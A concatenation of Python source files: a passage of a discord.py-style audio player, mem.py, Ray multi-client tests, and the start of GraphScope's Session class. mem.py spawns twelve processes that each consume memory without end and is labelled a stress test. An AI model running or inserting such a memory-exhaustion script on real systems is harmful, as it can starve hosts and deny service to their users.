            bitrate = int(streamdata.get('bit_rate', 0))
            # NOTE(review): max() here *floors* the probed bitrate at 512 kbps,
            # so every real-world probe reports 512. If the intent was to cap at
            # Discord's 512 kbps maximum this should be min(...) — confirm before
            # changing, since from_probe feeds this value straight into '-b:a'.
            bitrate = max(round(bitrate/1000), 512)
        return codec, bitrate

    @staticmethod
    def _probe_codec_fallback(source, executable: str = 'ffmpeg') -> Tuple[Optional[str], Optional[int]]:
        """Probe codec/bitrate by scraping ffmpeg's banner output (no ffprobe needed)."""
        args = [executable, '-hide_banner', '-i', source]
        proc = subprocess.Popen(args, creationflags=CREATE_NO_WINDOW, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
        out, _ = proc.communicate(timeout=20)
        output = out.decode('utf8')
        codec = bitrate = None

        codec_match = re.search(r"Stream #0.*?Audio: (\w+)", output)
        if codec_match:
            codec = codec_match.group(1)

        br_match = re.search(r"(\d+) [kK]b/s", output)
        if br_match:
            # NOTE(review): same suspicious 512-kbps floor as _probe_codec_native;
            # kept as-is for behavioral parity — verify whether min() was intended.
            bitrate = max(int(br_match.group(1)), 512)

        return codec, bitrate

    def read(self) -> bytes:
        # Each Ogg packet is one Opus frame; b'' once the stream is exhausted.
        return next(self._packet_iter, b'')

    def is_opus(self) -> bool:
        return True
class PCMVolumeTransformer(AudioSource, Generic[AT]):
    """Wraps another :class:`AudioSource` and applies a volume scale to it.

    Sources whose :meth:`AudioSource.is_opus` returns ``True`` are not
    supported, since encoded Opus data cannot be scaled sample-wise.

    Parameters
    ------------
    original: :class:`AudioSource`
        The source whose audio should be scaled.
    volume: :class:`float`
        The starting volume; see :attr:`volume` for details.

    Raises
    -------
    TypeError
        Not an audio source.
    ClientException
        The audio source is opus encoded.
    """

    def __init__(self, original: AT, volume: float = 1.0):
        if not isinstance(original, AudioSource):
            raise TypeError(f'expected AudioSource not {original.__class__.__name__}.')
        if original.is_opus():
            raise ClientException('AudioSource must not be Opus encoded.')
        self.original: AT = original
        self.volume = volume

    @property
    def volume(self) -> float:
        """The volume as a floating point percentage (``1.0`` means 100%)."""
        return self._volume

    @volume.setter
    def volume(self, value: float) -> None:
        # Negative volume is meaningless; clamp at zero.
        self._volume = max(value, 0.0)

    def cleanup(self) -> None:
        # Delegate resource release to the wrapped source.
        self.original.cleanup()

    def read(self) -> bytes:
        frame = self.original.read()
        # audioop.mul scales 16-bit PCM samples; the factor is capped at 2.0 (200%).
        return audioop.mul(frame, 2, min(self._volume, 2.0))
class AudioPlayer(threading.Thread):
    """Background thread that pulls 20ms frames from an :class:`AudioSource`
    and sends them to the voice client at a steady cadence.
    """
    # Seconds per audio frame (FRAME_LENGTH is in milliseconds).
    DELAY: float = OpusEncoder.FRAME_LENGTH / 1000.0
    def __init__(self, source: AudioSource, client: VoiceClient, *, after=None):
        threading.Thread.__init__(self)
        self.daemon: bool = True
        self.source: AudioSource = source
        self.client: VoiceClient = client
        # Optional callback invoked once playback ends; receives the error (or None).
        self.after: Optional[Callable[[Optional[Exception]], Any]] = after
        self._end: threading.Event = threading.Event()
        self._resumed: threading.Event = threading.Event()
        self._resumed.set() # we are not paused
        self._current_error: Optional[Exception] = None
        self._connected: threading.Event = client._connected
        self._lock: threading.Lock = threading.Lock()
        if after is not None and not callable(after):
            raise TypeError('Expected a callable for the "after" parameter.')
    def _do_run(self) -> None:
        """Main playback loop: read a frame, send it, sleep until the next slot."""
        self.loops = 0
        self._start = time.perf_counter()
        # getattr lookup speed ups
        play_audio = self.client.send_audio_packet
        self._speak(True)
        while not self._end.is_set():
            # are we paused?
            if not self._resumed.is_set():
                # wait until we aren't
                self._resumed.wait()
                continue
            # are we disconnected from voice?
            if not self._connected.is_set():
                # wait until we are connected
                self._connected.wait()
                # reset our internal data
                self.loops = 0
                self._start = time.perf_counter()
            self.loops += 1
            data = self.source.read()
            if not data:
                # Empty read signals end of the source.
                self.stop()
                break
            play_audio(data, encode=not self.source.is_opus())
            # Schedule against the original start time so per-iteration jitter
            # does not accumulate into drift.
            next_time = self._start + self.DELAY * self.loops
            delay = max(0, self.DELAY + (next_time - time.perf_counter()))
            time.sleep(delay)
    def run(self) -> None:
        try:
            self._do_run()
        except Exception as exc:
            # Remember the error so _call_after can report it.
            self._current_error = exc
            self.stop()
        finally:
            self.source.cleanup()
            self._call_after()
    def _call_after(self) -> None:
        """Invoke the user's 'after' callback (if any) or log the playback error."""
        error = self._current_error
        if self.after is not None:
            try:
                self.after(error)
            except Exception as exc:
                _log.exception('Calling the after function failed.')
                exc.__context__ = error
                traceback.print_exception(type(exc), exc, exc.__traceback__)
        elif error:
            msg = f'Exception in voice thread {self.name}'
            _log.exception(msg, exc_info=error)
            print(msg, file=sys.stderr)
            traceback.print_exception(type(error), error, error.__traceback__)
    def stop(self) -> None:
        """Stop playback permanently; also wakes a paused loop so it can exit."""
        self._end.set()
        self._resumed.set()
        self._speak(False)
    def pause(self, *, update_speaking: bool = True) -> None:
        """Pause playback; the loop blocks until resume() is called."""
        self._resumed.clear()
        if update_speaking:
            self._speak(False)
    def resume(self, *, update_speaking: bool = True) -> None:
        """Resume playback, resetting the timing baseline to avoid a burst of frames."""
        self.loops = 0
        self._start = time.perf_counter()
        self._resumed.set()
        if update_speaking:
            self._speak(True)
    def is_playing(self) -> bool:
        return self._resumed.is_set() and not self._end.is_set()
    def is_paused(self) -> bool:
        return not self._end.is_set() and not self._resumed.is_set()
    def _set_source(self, source: AudioSource) -> None:
        # Swap sources atomically: pause, replace, resume under the lock.
        with self._lock:
            self.pause(update_speaking=False)
            self.source = source
            self.resume(update_speaking=False)
    def _speak(self, speaking: bool) -> None:
        # Best-effort: toggling the speaking state must never kill the player thread.
        try:
            asyncio.run_coroutine_threadsafe(self.client.ws.speak(speaking), self.client.loop)
        except Exception as e:
            _log.info("Speaking call in player failed: %s", e)
|
mem.py | #!/usr/bin/python3
import multiprocessing
def worker():
    # Memory-stress payload: grow a list forever so each child process
    # steadily consumes memory. This function never returns.
    a = []
    while True:
        i = 1
        a.append(i)
for i in range(12):
    p = multiprocessing.Process(target=worker)
    p.start()
# NOTE(review): only the last-created process is joined; the other 11 run
# unjoined. Since worker() never returns, this join blocks indefinitely and
# "Exit" is unreachable in practice — presumably intentional for a stress test.
p.join()
print("Exit")
|
test_client_multi.py | import sys
import pytest
import ray
@pytest.mark.skipif(
    sys.platform == "win32",
    reason="PSUtil does not work the same on windows.")
@pytest.mark.parametrize(
    "call_ray_start",
    ["ray start --head --ray-client-server-port 25001 --port 0"],
    indirect=True)
def test_multi_cli_basic(call_ray_start):
    """Objects put via one client context are visible only in that context."""
    ray.init("ray://localhost:25001")
    cli1 = ray.init("ray://localhost:25001", allow_multiple=True)
    cli2 = ray.init("ray://localhost:25001", allow_multiple=True)
    with cli1:
        a = ray.put(10)
    with cli2:
        b = ray.put(20)
    # TODO better error message.
    # Right now, it's EOFError actually
    with pytest.raises(Exception):
        ray.get(a)
    # Cross-client access must fail in either direction.
    with pytest.raises(Exception), cli2:
        ray.get(a)
    with pytest.raises(Exception), cli1:
        ray.get(b)
    # The default (non-context) connection still works for new objects.
    c = ray.put(30)
    with cli1:
        assert 10 == ray.get(a)
    with cli2:
        assert 20 == ray.get(b)
    # Objects put on the default connection are invisible inside cli1/cli2.
    with pytest.raises(Exception), cli1:
        ray.get(c)
    with pytest.raises(Exception), cli2:
        ray.get(c)
@pytest.mark.skipif(
    sys.platform == "win32",
    reason="PSUtil does not work the same on windows.")
@pytest.mark.parametrize(
    "call_ray_start",
    ["ray start --head --ray-client-server-port 25001 --port 0"],
    indirect=True)
def test_multi_cli_init(call_ray_start):
    """A default ray.init is rejected while allow_multiple clients are live."""
    cli1 = ray.init("ray://localhost:25001", allow_multiple=True) # noqa
    with pytest.raises(
            ValueError,
            match="The client has already connected to the cluster "
            "with allow_multiple=True. Please set allow_multiple=True"
            " to proceed"):
        ray.init("ray://localhost:25001")
    cli2 = ray.init("ray://localhost:25001", allow_multiple=True) # noqa
    # After disconnecting all multi-clients, a default connection is allowed
    # again, and further allow_multiple clients may coexist with it.
    cli1.disconnect()
    cli2.disconnect()
    ray.init("ray://localhost:25001")
    cli1 = ray.init("ray://localhost:25001", allow_multiple=True) # noqa
@pytest.mark.skipif(
    sys.platform == "win32",
    reason="PSUtil does not work the same on windows.")
@pytest.mark.parametrize(
    "call_ray_start",
    ["ray start --head --ray-client-server-port 25001 --port 0"],
    indirect=True)
def test_multi_cli_func(call_ray_start):
    """Remote function results are scoped to the client that produced them."""
    @ray.remote
    def hello():
        return "world"
    cli1 = ray.init("ray://localhost:25001", allow_multiple=True)
    cli2 = ray.init("ray://localhost:25001", allow_multiple=True)
    # TODO better error message.
    # Right now, it's EOFError actually
    # Invoking a remote function outside any client context must fail.
    with pytest.raises(Exception):
        ray.get(hello.remote())
    with cli1:
        o1 = hello.remote()
        assert "world" == ray.get(o1)
    with cli2:
        o2 = hello.remote()
        assert "world" == ray.get(o2)
    # Object refs from one client cannot be fetched through the other.
    with pytest.raises(Exception), cli1:
        ray.get(o2)
    with pytest.raises(Exception), cli2:
        ray.get(o1)
@pytest.mark.skipif(
    sys.platform == "win32",
    reason="PSUtil does not work the same on windows.")
@pytest.mark.parametrize(
    "call_ray_start",
    ["ray start --head --ray-client-server-port 25001 --port 0"],
    indirect=True)
def test_multi_cli_actor(call_ray_start):
    """Actor handles and their results are scoped to the creating client."""
    @ray.remote
    class Actor:
        def __init__(self, v):
            self.v = v
        def double(self):
            return self.v * 2
    cli1 = ray.init("ray://localhost:25001", allow_multiple=True)
    cli2 = ray.init("ray://localhost:25001", allow_multiple=True)
    # TODO better error message.
    # Right now, it's EOFError actually
    # Creating/using an actor outside any client context must fail.
    with pytest.raises(Exception):
        a = Actor.remote(10)
        ray.get(a.double.remote())
    with cli1:
        a1 = Actor.remote(10)
        o1 = a1.double.remote()
        assert 20 == ray.get(o1)
    with cli2:
        a2 = Actor.remote(20)
        o2 = a2.double.remote()
        assert 40 == ray.get(o2)
    # Neither the other client's actor handle nor its object refs are usable.
    with pytest.raises(Exception), cli1:
        ray.get(a2.double.remote())
    with pytest.raises(Exception), cli1:
        ray.get(o2)
    with pytest.raises(Exception), cli2:
        ray.get(a1.double.remote())
    with pytest.raises(Exception), cli2:
        ray.get(o1)
@pytest.mark.skipif(
    sys.platform == "win32",
    reason="PSUtil does not work the same on windows.")
@pytest.mark.parametrize(
    "call_ray_start",
    ["ray start --head --ray-client-server-port 25001 --port 0"],
    indirect=True)
def test_multi_cli_threading(call_ray_start):
    """Each thread can hold its own client; barriers force true concurrency."""
    import threading
    b = threading.Barrier(2)
    ret = [None, None]
    def get(idx):
        # Per-thread client: put/get idx while the other thread does the same.
        cli = ray.init("ray://localhost:25001", allow_multiple=True)
        with cli:
            a = ray.put(idx)
            b.wait()
            v = ray.get(a)
            assert idx == v
            b.wait()
            ret[idx] = v
    t1 = threading.Thread(target=get, args=(0, ))
    t2 = threading.Thread(target=get, args=(1, ))
    t1.start()
    t2.start()
    t1.join()
    t2.join()
    assert ret == [0, 1]
if __name__ == "__main__":
    # Allow running this test module directly by delegating to pytest.
    sys.exit(pytest.main(["-v", __file__]))
|
session.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Copyright 2020 Alibaba Group Holding Limited. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
""" Manage sessions to the GraphScope coordinator.
"""
import atexit
import base64
import contextlib
import json
import logging
import os
import pickle
import signal
import threading
import time
import uuid
import warnings
try:
    # Kubernetes support is optional: fall back to None when the client
    # library is not installed (non-k8s deployments don't need it).
    from kubernetes import client as kube_client
    from kubernetes import config as kube_config
except ImportError:
    kube_client = None
    kube_config = None
import graphscope
from graphscope.client.rpc import GRPCClient
from graphscope.client.utils import CaptureKeyboardInterrupt
from graphscope.client.utils import GSLogger
from graphscope.client.utils import SignalIgnore
from graphscope.client.utils import set_defaults
from graphscope.config import GSConfig as gs_config
from graphscope.deploy.hosts.cluster import HostsClusterLauncher
from graphscope.deploy.kubernetes.cluster import KubernetesClusterLauncher
from graphscope.framework.dag import Dag
from graphscope.framework.errors import FatalError
from graphscope.framework.errors import InteractiveEngineInternalError
from graphscope.framework.errors import InvalidArgumentError
from graphscope.framework.errors import K8sError
from graphscope.framework.graph import Graph
from graphscope.framework.graph import GraphDAGNode
from graphscope.framework.operation import Operation
from graphscope.framework.utils import decode_dataframe
from graphscope.framework.utils import decode_numpy
from graphscope.interactive.query import InteractiveQuery
from graphscope.interactive.query import InteractiveQueryDAGNode
from graphscope.interactive.query import InteractiveQueryStatus
from graphscope.proto import graph_def_pb2
from graphscope.proto import message_pb2
from graphscope.proto import op_def_pb2
from graphscope.proto import types_pb2
# Path of the user-level session configuration file; overridable through the
# GS_CONFIG_PATH environment variable.
DEFAULT_CONFIG_FILE = os.environ.get(
    "GS_CONFIG_PATH", os.path.expanduser("~/.graphscope/session.json")
)
# Registry of live sessions in this process.
_session_dict = {}
logger = logging.getLogger("graphscope")
class _FetchHandler(object):
    """Handler for structured fetches.
    This class takes care of extracting a sub-DAG as targets for a user-provided structure for fetches,
    which can be used for a low level `run` call of grpc_client.
    Given the results of the low level run call, this class can also rebuild a result structure matching
    the user-provided structure for fetches, but containing the corresponding results.
    """
    def __init__(self, dag, fetches):
        # Normalize fetches to a list; remember whether to unwrap the single
        # result again in wrap_results.
        self._fetches = fetches
        self._ops = list()
        self._unpack = False
        if not isinstance(self._fetches, (list, tuple)):
            self._fetches = [self._fetches]
            self._unpack = True
        for fetch in self._fetches:
            # DAG nodes carry their underlying Operation in `.op`.
            if hasattr(fetch, "op"):
                fetch = fetch.op
            if not isinstance(fetch, Operation):
                raise ValueError("Expect a `Operation` in sess run method.")
            self._ops.append(fetch)
        # extract sub dag
        self._sub_dag = dag.extract_subdag_for(self._ops)
        if "debug" in os.environ:
            logger.info("sub_dag: %s", self._sub_dag)
    @property
    def targets(self):
        # The sub-DAG handed to the low-level grpc run call.
        return self._sub_dag
    def _rebuild_graph(self, seq, op: Operation, op_result: op_def_pb2.OpResult):
        """Rebuild a Graph result for the fetch at position ``seq``."""
        if isinstance(self._fetches[seq], Operation):
            # for nx Graph
            return op_result.graph_def
        # get graph dag node as base
        graph_dag_node = self._fetches[seq]
        # construct graph
        g = Graph(graph_dag_node)
        # update graph field from graph_def
        g.update_from_graph_def(op_result.graph_def)
        return g
    def _rebuild_learning_graph(
        self, seq, op: Operation, op_result: op_def_pb2.OpResult
    ):
        """Rebuild a learning (GNN) Graph from the op result's encoded handle."""
        from graphscope.learning.graph import Graph as LearningGraph
        # The handle is base64-encoded JSON produced by the coordinator.
        handle = op_result.handle
        handle = json.loads(base64.b64decode(handle).decode("utf-8"))
        config = op_result.config.decode("utf-8")
        handle["server"] = op_result.result.decode("utf-8")
        handle["client_count"] = 1
        graph_dag_node = self._fetches[seq]
        # construct learning graph
        g = LearningGraph(
            graph_dag_node, handle, config, op_result.extra_info.decode("utf-8")
        )
        return g
    def _rebuild_interactive_query(
        self, seq, op: Operation, op_result: op_def_pb2.OpResult
    ):
        """Rebuild an InteractiveQuery (gremlin endpoint) from the op result."""
        # get interactive query dag node as base
        interactive_query_node = self._fetches[seq]
        # construct interactive query
        interactive_query = InteractiveQuery(
            interactive_query_node,
            op_result.result.decode("utf-8"),
            op_result.extra_info.decode("utf-8"),
        )
        interactive_query.status = InteractiveQueryStatus.Running
        return interactive_query
    def _rebuild_app(self, seq, op: Operation, op_result: op_def_pb2.OpResult):
        """Rebuild a bound App from the op result."""
        from graphscope.framework.app import App
        # get app dag node as base
        app_dag_node = self._fetches[seq]
        # construct app
        app = App(app_dag_node, op_result.result.decode("utf-8"))
        return app
    def _rebuild_context(self, seq, op: Operation, op_result: op_def_pb2.OpResult):
        """Rebuild a Context (app run result) from the op result."""
        from graphscope.framework.context import Context
        from graphscope.framework.context import DynamicVertexDataContext
        # get context dag node as base
        context_dag_node = self._fetches[seq]
        ret = json.loads(op_result.result.decode("utf-8"))
        context_type = ret["context_type"]
        if context_type == "dynamic_vertex_data":
            # for nx
            return DynamicVertexDataContext(context_dag_node, ret["context_key"])
        return Context(context_dag_node, ret["context_key"], ret["context_schema"])
    def _rebuild_gremlin_results(
        self, seq, op: Operation, op_result: op_def_pb2.OpResult
    ):
        """Rebuild a gremlin ResultSet from the fetched DAG node."""
        from graphscope.interactive.query import ResultSet
        # get result set node as base
        result_set_dag_node = self._fetches[seq]
        return ResultSet(result_set_dag_node)
    def wrap_results(self, response: message_pb2.RunStepResponse):
        """Match each fetched op to its result in ``response`` and rebuild the
        user-facing object based on the op's declared output type."""
        rets = list()
        for seq, op in enumerate(self._ops):
            for op_result in response.results:
                # Results are matched to ops by key, not by position.
                if op.key == op_result.key:
                    if op.output_types == types_pb2.RESULTS:
                        if op.type == types_pb2.RUN_APP:
                            rets.append(self._rebuild_context(seq, op, op_result))
                        elif op.type == types_pb2.FETCH_GREMLIN_RESULT:
                            rets.append(pickle.loads(op_result.result))
                        else:
                            # for nx Graph
                            rets.append(op_result.result.decode("utf-8"))
                    if op.output_types == types_pb2.GREMLIN_RESULTS:
                        rets.append(self._rebuild_gremlin_results(seq, op, op_result))
                    if op.output_types == types_pb2.GRAPH:
                        rets.append(self._rebuild_graph(seq, op, op_result))
                    if op.output_types == types_pb2.LEARNING_GRAPH:
                        rets.append(self._rebuild_learning_graph(seq, op, op_result))
                    if op.output_types == types_pb2.APP:
                        rets.append(None)
                    if op.output_types == types_pb2.BOUND_APP:
                        rets.append(self._rebuild_app(seq, op, op_result))
                    if op.output_types in (
                        types_pb2.VINEYARD_TENSOR,
                        types_pb2.VINEYARD_DATAFRAME,
                    ):
                        rets.append(
                            json.loads(op_result.result.decode("utf-8"))["object_id"]
                        )
                    if op.output_types in (types_pb2.TENSOR, types_pb2.DATAFRAME):
                        if (
                            op.type == types_pb2.CONTEXT_TO_DATAFRAME
                            or op.type == types_pb2.GRAPH_TO_DATAFRAME
                        ):
                            rets.append(decode_dataframe(op_result.result))
                        if (
                            op.type == types_pb2.CONTEXT_TO_NUMPY
                            or op.type == types_pb2.GRAPH_TO_NUMPY
                        ):
                            rets.append(decode_numpy(op_result.result))
                    if op.output_types == types_pb2.INTERACTIVE_QUERY:
                        rets.append(self._rebuild_interactive_query(seq, op, op_result))
                    if op.output_types == types_pb2.NULL_OUTPUT:
                        rets.append(None)
                    break
        # Unwrap when the user passed a single fetch rather than a list/tuple.
        return rets[0] if self._unpack else rets
    def get_dag_for_unload(self):
        """Unload operations (graph, app, context) in dag which are not
        existed in fetches.
        """
        unload_dag = op_def_pb2.DagDef()
        keys_of_fetches = set([op.key for op in self._ops])
        # Each resource-creating op type maps to its corresponding unload op.
        mapping = {
            types_pb2.CREATE_GRAPH: types_pb2.UNLOAD_GRAPH,
            types_pb2.CREATE_APP: types_pb2.UNLOAD_APP,
            types_pb2.RUN_APP: types_pb2.UNLOAD_CONTEXT,
        }
        for op_def in self._sub_dag.op:
            # Only unload resources the user did not ask to keep (fetch).
            if op_def.op in mapping and op_def.key not in keys_of_fetches:
                unload_op_def = op_def_pb2.OpDef(
                    op=mapping[op_def.op], key=uuid.uuid4().hex
                )
                unload_op_def.parents.extend([op_def.key])
                unload_dag.op.extend([unload_op_def])
        return unload_dag
class Session(object):
    """A class for interacting with a GraphScope graph computation service cluster.
    A :class:`Session` object encapsulates the environment in which :class:`Operation`
    objects are executed/evaluated.
    A session may own resources. It is important to release these resources when
    they are no longer required. To do this, invoke the :meth:`close` method
    on the session.
    A Session can register itself as the default session with :meth:`as_default`, and all
    operations after that will use the default session. A session deregisters itself as the
    default session when closed.
    The following example demonstrates its usage:
    .. code:: python
        >>> import graphscope as gs
        >>> # use session object explicitly
        >>> sess = gs.session()
        >>> g = sess.g()
        >>> pg = g.project(vertices={'v': []}, edges={'e': ['dist']})
        >>> r = gs.sssp(pg, 4)
        >>> sess.close()
        >>> # or use a session as default
        >>> sess = gs.session().as_default()
        >>> g = gs.g()
        >>> pg = g.project(vertices={'v': []}, edges={'e': ['dist']})
        >>> r = gs.sssp(pg, 4)
        >>> sess.close()
    We support setting up a service cluster and creating an RPC session in the following ways:
    - GraphScope graph computation service run in cluster managed by kubernetes.
        >>> s = graphscope.session()
    Also, :class:`Session` provides several keyword params for users to define the cluster.
    You may use the param :code:`k8s_gs_image` to specify the image for all engine pod, and
    param :code:`k8s_engine_cpu` or :code:`k8s_engine_mem` to specify the resources. More,
    you can find all params detail in :meth:`__init__` method.
        >>> s = graphscope.session(
        ...     k8s_gs_image="registry.cn-hongkong.aliyuncs.com/graphscope/graphscope:latest",
        ...     k8s_vineyard_cpu=0.1,
        ...     k8s_vineyard_mem="256Mi",
        ...     vineyard_shared_mem="4Gi",
        ...     k8s_engine_cpu=0.1,
        ...     k8s_engine_mem="256Mi")
    - or all params can be provided by a json configuration file or configuration dict.
        >>> s = graphscope.session(config='/tmp/config.json')
        >>> # Or
        >>> s = graphscope.session(config={'k8s_engine_cpu': 5, 'k8s_engine_mem': '5Gi'})
    """
    @set_defaults(gs_config)
    def __init__(
        self,
        config=None,
        addr=gs_config.addr,
        mode=gs_config.mode,
        cluster_type=gs_config.cluster_type,
        num_workers=gs_config.num_workers,
        preemptive=gs_config.preemptive,
        k8s_namespace=gs_config.k8s_namespace,
        k8s_service_type=gs_config.k8s_service_type,
        k8s_gs_image=gs_config.k8s_gs_image,
        k8s_etcd_image=gs_config.k8s_etcd_image,
        k8s_dataset_image=gs_config.k8s_dataset_image,
        k8s_image_pull_policy=gs_config.k8s_image_pull_policy,
        k8s_image_pull_secrets=gs_config.k8s_image_pull_secrets,
        k8s_coordinator_cpu=gs_config.k8s_coordinator_cpu,
        k8s_coordinator_mem=gs_config.k8s_coordinator_mem,
        k8s_etcd_num_pods=gs_config.k8s_etcd_num_pods,
        k8s_etcd_cpu=gs_config.k8s_etcd_cpu,
        k8s_etcd_mem=gs_config.k8s_etcd_mem,
        k8s_vineyard_daemonset=gs_config.k8s_vineyard_daemonset,
        k8s_vineyard_cpu=gs_config.k8s_vineyard_cpu,
        k8s_vineyard_mem=gs_config.k8s_vineyard_mem,
        vineyard_shared_mem=gs_config.vineyard_shared_mem,
        k8s_engine_cpu=gs_config.k8s_engine_cpu,
        k8s_engine_mem=gs_config.k8s_engine_mem,
        k8s_mars_worker_cpu=gs_config.mars_worker_cpu,
        k8s_mars_worker_mem=gs_config.mars_worker_mem,
        k8s_mars_scheduler_cpu=gs_config.mars_scheduler_cpu,
        k8s_mars_scheduler_mem=gs_config.mars_scheduler_mem,
        k8s_volumes=gs_config.k8s_volumes,
        k8s_waiting_for_delete=gs_config.k8s_waiting_for_delete,
        timeout_seconds=gs_config.timeout_seconds,
        dangling_timeout_seconds=gs_config.dangling_timeout_seconds,
        with_mars=gs_config.with_mars,
        mount_dataset=gs_config.mount_dataset,
        reconnect=False,
        **kw,
    ):
        """Construct a new GraphScope session.
        Args:
            config (dict or str, optional): The configuration dict or file about how to launch the GraphScope instance.
                For str, it will identify it as a path and read the configuration file to build a
                session if the file exists. If not specified, the global default configuration
                :code:`DEFAULT_CONFIG_FILE` will be used, which gets the value of GS_CONFIG_PATH
                in environment. Note that it will overwrite explicit parameters. Defaults to None.
            addr (str, optional): The endpoint of a pre-launched GraphScope instance with '<ip>:<port>' format.
                A new session id will be generated for each session connection.
            mode (str, optional): optional values are eager and lazy. Defaults to eager.
                Eager execution is a flexible platform for research and experimentation, it provides:
                    An intuitive interface: Quickly test on small data.
                    Easier debugging: Call ops directly to inspect running models and test changes.
                Lazy execution means GraphScope does not process the data till it has to. It just gathers all the
                information to a DAG that we feed into it, and processes only when we execute :code:`sess.run(fetches)`
            cluster_type (str, optional): Deploy GraphScope instance on hosts or k8s cluster. Defaults to k8s.
                Available options: "k8s" and "hosts". Note that only support deployed on localhost with hosts mode.
            num_workers (int, optional): The number of workers to launch GraphScope engine. Defaults to 2.
            preemptive (bool, optional): If True, GraphScope instance will treat resource params (e.g. k8s_coordinator_cpu)
                as limits and provide the minimum available value as requests, but this will make pod has a `Burstable` QOS,
                which can be preempted by other pods with high QOS. Otherwise, it will set both requests and limits with the
                same value.
            k8s_namespace (str, optional): Contains the namespace to create all resource inside.
                If param missing, it will try to read namespace from kubernetes context, or
                a random namespace will be created and deleted if namespace not exist.
                Defaults to None.
            k8s_service_type (str, optional): Type determines how the GraphScope service is exposed.
                Valid options are NodePort, and LoadBalancer. Defaults to NodePort.
            k8s_gs_image (str, optional): The GraphScope engine's image.
            k8s_etcd_image (str, optional): The image of etcd, which used by vineyard.
            k8s_dataset_image (str, optional): The image which mounts aliyun dataset bucket to local path.
            k8s_image_pull_policy (str, optional): Kubernetes image pull policy. Defaults to "IfNotPresent".
            k8s_image_pull_secrets (list[str], optional): A list of secret name used to authorize pull image.
            k8s_vineyard_daemonset (str, optional): The name of vineyard Helm deployment to use. GraphScope will try to
                discovery the daemonset from kubernetes cluster, then use it if exists, and fallback to launching
                a bundled vineyard container otherwise.
            k8s_vineyard_cpu (float, optional): Minimum number of CPU cores request for vineyard container. Defaults to 0.5.
            k8s_vineyard_mem (str, optional): Minimum number of memory request for vineyard container. Defaults to '512Mi'.
            vineyard_shared_mem (str, optional): Init size of vineyard shared memory. Defaults to '4Gi'.
            k8s_engine_cpu (float, optional): Minimum number of CPU cores request for engine container. Defaults to 0.5.
            k8s_engine_mem (str, optional): Minimum number of memory request for engine container. Defaults to '4Gi'.
            k8s_coordinator_cpu (float, optional): Minimum number of CPU cores request for coordinator pod. Defaults to 1.0.
            k8s_coordinator_mem (str, optional): Minimum number of memory request for coordinator pod. Defaults to '4Gi'.
            k8s_etcd_num_pods (int, optional): The number of etcd pods. Defaults to 3.
            k8s_etcd_cpu (float, optional): Minimum number of CPU cores request for etcd pod. Defaults to 0.5.
            k8s_etcd_mem (str, optional): Minimum number of memory request for etcd pod. Defaults to '128Mi'.
            k8s_mars_worker_cpu (float, optional):
                Minimum number of CPU cores request for mars worker container. Defaults to 0.5.
            k8s_mars_worker_mem (str, optional):
                Minimum number of memory request for mars worker container. Defaults to '4Gi'.
            k8s_mars_scheduler_cpu (float, optional):
                Minimum number of CPU cores request for mars scheduler container. Defaults to 0.5.
            k8s_mars_scheduler_mem (str, optional):
                Minimum number of memory request for mars scheduler container. Defaults to '2Gi'.
            with_mars (bool, optional):
                Launch graphscope with mars. Defaults to False.
            mount_dataset (str, optional):
                Create a container and mount aliyun demo dataset bucket to the path specified by `mount_dataset`.
            k8s_volumes (dict, optional): A dict of k8s volume which represents a directory containing data, accessible to the
                containers in a pod. Defaults to {}.
                For example, you can mount host path with:
                k8s_volumes = {
                    "my-data": {
                        "type": "hostPath",
                        "field": {
                            "path": "<path>",
                            "type": "Directory"
                        },
                        "mounts": [
                            {
                                "mountPath": "<path1>"
                            },
                            {
                                "mountPath": "<path2>"
                            }
                        ]
                    }
                }
                Or you can mount PVC with:
                k8s_volumes = {
                    "my-data": {
                        "type": "persistentVolumeClaim",
                        "field": {
                            "claimName": "your-pvc-name"
                        },
                        "mounts": [
                            {
                                "mountPath": "<path1>"
                            }
                        ]
                    }
                }
                Also, you can mount a single volume with:
                k8s_volumes = {
                    "my-data": {
                        "type": "hostPath",
                        "field": {xxx},
                        "mounts": {
                            "mountPath": "<path1>"
                        }
                    }
                }
            timeout_seconds (int, optional): For waiting service ready (or waiting for delete if
                k8s_waiting_for_delete is True).
            dangling_timeout_seconds (int, optional): After seconds of client disconnect,
                coordinator will kill this graphscope instance. Defaults to 600.
                Expect this value to be greater than 5 (heartbeat interval).
                Disable dangling check by setting -1.
            k8s_waiting_for_delete (bool, optional): Waiting for service delete or not. Defaults to False.
            **kw (dict, optional): Other optional parameters will be put to :code:`**kw`.
                - k8s_minikube_vm_driver: Deprecated.
                - k8s_client_config (dict, optional):
                    Provide configurable parameters for connecting to remote k8s,
                    which strongly relies on the `kube_config.new_client_from_config` function.
                    eg: {"config_file": "~/.kube/config", "context": None, "persist_config": True}
                    config_file: Name of the kube-config file.
                    context: set the active context. If is set to None, current_context from config file will be used.
                    persist_config: If True, config file will be updated when changed(e.g GCP token refresh).
                - log_level: Deprecated.
                    Move this param as a global configuration. Set via `graphscope.set_option(log_level='DEBUG')`
                - show_log: Deprecated.
                    Move this param as a global configuration. Set via `graphscope.set_option(show_log=True)`
                - k8s_vineyard_shared_mem: Deprecated.
                    Please use vineyard_shared_mem instead.
            reconnect (bool, optional): When connecting to a pre-launched GraphScope cluster with :code:`addr`,
                the connect request would be rejected with there is still an existing session connected. There
                are cases where the session still exists and user's client has lost connection with the backend,
                e.g., in a jupyter notebook. We have a :code:`dangling_timeout_seconds` for it, but a more
                deterministic behavior would be better.
                If :code:`reconnect` is True, the existing session will be reused. It is the user's responsibility
                to ensure there's no such an active client actually.
                Defaults to :code:`False`.
                - k8s_gie_graph_manager_image: Deprecated.
                - k8s_gie_graph_manager_cpu: Deprecated.
                - k8s_gie_graph_manager_mem: Deprecated.
                - k8s_zookeeper_image: Deprecated.
                - k8s_zookeeper_cpu: Deprecated.
                - k8s_zookeeper_mem: Deprecated.
        Raises:
            TypeError: If the given argument combination is invalid and cannot be used to create
                a GraphScope session.
        """
        self._config_params = {}
        self._accessable_params = (
            "addr",
            "mode",
            "cluster_type",
            "num_workers",
            "preemptive",
            "k8s_namespace",
            "k8s_service_type",
            "k8s_gs_image",
            "k8s_etcd_image",
